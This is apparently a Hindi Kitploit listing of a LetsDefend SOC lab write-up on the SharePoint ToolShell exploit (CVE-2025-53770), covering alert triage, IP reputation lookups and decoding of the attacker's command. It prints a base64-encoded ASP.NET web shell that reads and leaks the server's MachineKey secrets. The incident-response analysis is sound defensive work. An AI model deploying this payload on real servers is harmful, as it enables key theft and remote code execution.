Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — CVE-2025-53770 (ToolShell) SharePoint ज़ीरो-डे शोषण का विस्तृत विवरण, जिसमें RCE विश्लेषण, MachineKey निष्कासन, पेलोड संकलन, वेब शेल तैनाती, और घटना प्रतिक्रिया रोकथाम चरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
समझौता संकेतक (IOC) प्रबंधनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणडिजिटल फोरेंसिकपेनिट्रेशन टेस्टिंगखतरा खुफियालर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
घटना प्रतिक्रिया
लैब और अभ्यास
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

CVE-2025-53770 (ToolShell) SharePoint ज़ीरो-डे शोषण का विस्तृत विवरण, जिसमें RCE विश्लेषण, MachineKey निष्कासन, पेलोड संकलन, वेब शेल तैनाती, और घटना प्रतिक्रिया रोकथाम चरण शामिल हैं।

रिपॉजिटरी देखें
141 साल पहलेअभी तक समीक्षित नहीं
साझा करें

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

परिचय

मैंने LetsDefend लैब में ToolShell (CVE-2025-53770) नामक SharePoint ज़ीरो-डे का विश्लेषण किया। मैंने एक वास्तविक दुनिया के ज़ीरो-डे हमले की नकल की जहाँ एक दुर्भावनापूर्ण POST अनुरोध ने प्रमाणीकरण को बायपास किया, MachineKeySection कुंजियाँ चुराने के लिए PowerShell चलाया, payload.exe संकलित किया और एक वेब शेल (spinstall0.aspx) छोड़ा। मैंने सब कुछ लॉग किया, व्यवहार का विश्लेषण किया और होस्ट को कंटेन किया। यह README हमले की प्रक्रियाओं, हमले को रोकने के कदमों और सीखे गए सबक को कवर करता है।

लैब अवलोकन

  • प्लेटफ़ॉर्म: LetsDefend Cyber Range
  • लक्ष्य: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • उद्देश्य: RCE का विश्लेषण, डिटेक्शन और कंटेनमेंट का अभ्यास करना

उपयोग किए गए उपकरण:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

अलर्ट

image

यह एक गंभीर अलर्ट और संदिग्ध गतिविधि है जिसने MS SharePoint के ToolPane.aspx को बड़े पेलोड और स्पूफ़ किए गए Referer के साथ लक्षित किया। CVE संदर्भ CVE-2025-53770 से जुड़ा हुआ है। यह SharePoint की एक गंभीर भेद्यता है जिसका शोषण विशेष रूप से तैयार किए गए POST अनुरोध के माध्यम से किया जाता है, जिसने बिना प्रमाणीकरण वाले हमलावरों को अनुमति दी। सफल शोषण के परिणामस्वरूप सर्वर पर रिमोट कोड एक्सीक्यूशन (RCE) हुआ। मैंने इसे सक्रिय, उच्च-आपातकालीन स्थिति के रूप में माना और जब तक अन्यथा साबित न हो, संभावित सफल समझौता माना।

SharePoint का संक्षिप्त अर्थ

Microsoft SharePoint उद्यम सहयोग और दस्तावेज़ प्रबंधन के लिए एक प्लेटफ़ॉर्म है — अनिवार्य रूप से फ़ाइलों, वर्कफ़्लो और आंतरिक वेब ऐप्स के लिए एक सुरक्षित, संगठित केंद्र।

मुख्य उपयोग

  • दस्तावेज़ प्रबंधन: संस्करण नियंत्रण, ऑडिट ट्रेल और फ़ाइल अनुमतियाँ

  • सहयोग: कई उपयोगकर्ता एक साथ संपादित कर सकते हैं और दस्तावेज़ साझा कर सकते हैं

  • इंट्रानेट / पोर्टल: आंतरिक समाचार, HR नीतियाँ, डैशबोर्ड

  • वर्कफ़्लो और स्वचालन: फ़ॉर्म, अनुमोदन और सूचनाएँ

  • एकीकरण: Teams, Outlook, Office ऐप्स और Power BI से कनेक्ट होता है

SharePoint सुरक्षा संबंधी विचार

  • प्रमाणीकरण के लिए Active Directory या SSO का उपयोग करता है

  • डेटा आराम की स्थिति (at rest) और ट्रांज़िट में एन्क्रिप्टेड होता है

  • गलत कॉन्फ़िगरेशन होने पर वेब पार्ट्स और लेआउट का दुरुपयोग हो सकता है

  • ज़ीरो-डे शोषण से बचाव के लिए नियमित पैचिंग महत्वपूर्ण है

CVE-2025-53770 (ToolShell) क्या है

Microsoft SharePoint Server में एक गंभीर ज़ीरो-डे जो हमलावरों को बिना प्रमाणीकरण के दूरस्थ रूप से कोड चलाने की अनुमति देता है। यह असुरक्षित डी-सीरियलाइज़ेशन का दुरुपयोग करता है और पूर्ण सिस्टम अधिग्रहण के लिए अक्सर अन्य SharePoint कमज़ोरियों (CVE-2025-49704, CVE-2025-49706) के साथ चेन किया जाता है। CVSS 9.8 (गंभीर) रेटेड और जंगल में सक्रिय रूप से शोषित।

VirusTotal के साथ हमले का विश्लेषण

मैंने प्रेषक के IP पते (Source IP Address) का विश्लेषण VirusTotal के साथ किया स्रोत IP पता: 107.191.58.76 image

इससे मैं देख सकता हूँ कि 15/95 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया है, जो पहले से ही इस IP के बारे में बहुत कुछ कहता है।

IP स्थान

अब मुझे IP का स्थान खोजना है। यह AbuseIPDB की सहायता से किया गया और जैसा नीचे दिखाया गया है, यह IP हैकिंग, ब्रूट-फोर्स, वेब ऐप हमले, पोर्ट स्कैन, DNS पॉइज़निंग के लिए जाना जाता है।

image

एंडपॉइंट विश्लेषण

इसे हल करने वाले एक SOC विश्लेषक के रूप में, उठाया जाने वाला एक महत्वपूर्ण कदम एंडपॉइंट विश्लेषण है। मैंने आगे के विश्लेषण के लिए एंडपॉइंट सुरक्षा पर 'SharePoint01' नाम से होस्ट की खोज की, और यह IP हैकिंग के लिए जाना जाता है।

image

होस्ट का पता लगाने के बाद, मैंने कमांड लाइन की जाँच करने के लिए टर्मिनल इतिहास देखा

image

| टर्मिनल इतिहास कमांड लाइन

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

PowerShell फ़्लैग: -nop -w hidden -e

  • -nop = No profile (प्रोफ़ाइल स्क्रिप्ट से बचने के लिए)
  • -w hidden = विंडो को छिपाकर शुरू करें (स्टील्थ)
  • -e = एन्कोडेड कमांड

Base64 डिकोडर के साथ कमांड लाइन निष्कर्ष:

पेलोड के कारण, मैंने नीचे दिखाए अनुसार कमांड को डिकोड करने के लिए Base64 डिकोडर का उपयोग किया

image

उपयोगकर्ता ने सिस्टम निर्देशिका “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” से PowerShell लॉन्च किया और एन्कोडेड कमांड के साथ ASP.NET सर्वर-साइड C# स्क्रिप्ट चलाई।

  • System.Web असेंबली को लोड करने के लिए रिफ्लेक्शन का उपयोग करता है,
  • गैर-सार्वजनिक MachineKeySection तक पहुँचता है और एक गैर-सार्वजनिक विधि (GetApplicationConfig) को कॉल करता है,
  • वेब एप्लिकेशन के MachineKey मान (ValidationKey, DecryptionKey, आदि) पढ़ता है,
  • उन कुंजियों को HTTP प्रतिक्रिया में लिखता है (अर्थात, उन्हें बाहर निकालता है)।

पेलोड कैप्चर करना और पोस्ट-एक्सप्लॉइटेशन गतिविधियाँ: / _layouts/15/ToolPane.aspx?...

पेलोड होस्ट के लिए ASP.NET MachineKey को पढ़ने और लीक करने का प्रयास करता है — एक गुप्त कुंजी जिसका उपयोग ViewState/डी-सीरियलाइज़ेशन टोकन जाली बनाने और प्रमाणीकरण बायपास तथा रिमोट कोड एक्सीक्यूशन सक्षम करने के लिए किया जा सकता है। यह ToolShell शोषण पैटर्न (MachineKey का दुरुपयोग) से मेल खाता है। Base64 डिकोड और एनकोड के उपयोग से कमांड में समझौते के प्रमुख संकेतक (IoCs):

  • POST + बड़ा पेलोड + यह एन्कोडेड कमांड इंगित करता है कि हमलावर ने संभवतः ToolShell शोषण पथ के माध्यम से ऐसी सर्वर-साइड स्क्रिप्ट बनाने या चलाने का प्रयास किया।
  • मशीन एक्सपोज़र और अलर्ट ट्रिगर हुआ: -encodedCommand + छिपी हुई विंडो + base64 पेलोड का उपयोग चोरी-छिपे (evasion) और स्वचालित शोषण को इंगित करता है। हमलावर अक्सर पेलोड छिपाने और डिटेक्शन/कमांडलाइन लॉगिंग पैटर्न से बचने के लिए -encodedCommand का उपयोग करते हैं। यह हमलावर को दुर्भावनापूर्ण View State या सीरियलाइज़्ड पेलोड बनाने की अनुमति देता है जिसे एप्लिकेशन वैध मानकर स्वीकार कर लेता है, जिससे कमजोर SharePoint इंस्टेंस पर प्रमाणीकरण बायपास और रिमोट कोड एक्सीक्यूशन सक्षम होता है। ToolShell (CVE-2025-53770) के लिए, यह ठीक वही शोषण श्रृंखला है।

CMD निष्पादन और शोषण

टूल डाउनलोड करें